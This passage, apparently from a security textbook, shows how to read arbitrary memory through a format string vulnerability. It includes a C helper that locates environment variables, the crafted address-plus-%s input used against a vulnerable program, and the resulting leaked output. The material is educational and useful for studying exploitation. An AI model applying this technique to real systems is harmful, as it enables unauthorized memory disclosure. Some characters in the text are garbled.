Reading Arbitrary Memory
So how do we read from arbitrary memory locations? Simple: we supply valid addresses
within the segment of the current process. We will use the following helper program to
assist us in finding a valid address:
$ cat getenv.c
#include
int main(int argc, char *argv[]){
char * addr; //simple string to hold our input in bss section
addr = getenv(argv[1]); //initialize the addr var with input
printf("%s is located at %p\n", argv[1], addr);//display location
}
$ gcc -o getenv getenv.c
The purpose of this program is to fetch the location of environment variables from
the system. To test this program, let??™s check for the location of the SHELL variable, which
stores the location of the current user??™s shell:
$ ./getenv SHELL
SHELL is located at 0xbffffd84
Now that we have a valid memory address, let??™s try it. First, remember to reverse the
memory location because this system is little-endian:
$ ./fmtstr `printf "\x84\xfd\xff\xbf"`" %08x %08x %08x %s"
?????? bffffd2f 00000648 00000774 /bin/bash
Canary at 0x08049440 = 0x00000000
Success! We were able to read up to the first NULL character of the address given (the
SHELL environment variable). Take a moment to play with this now and check out
other environment variables.
Pages:
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351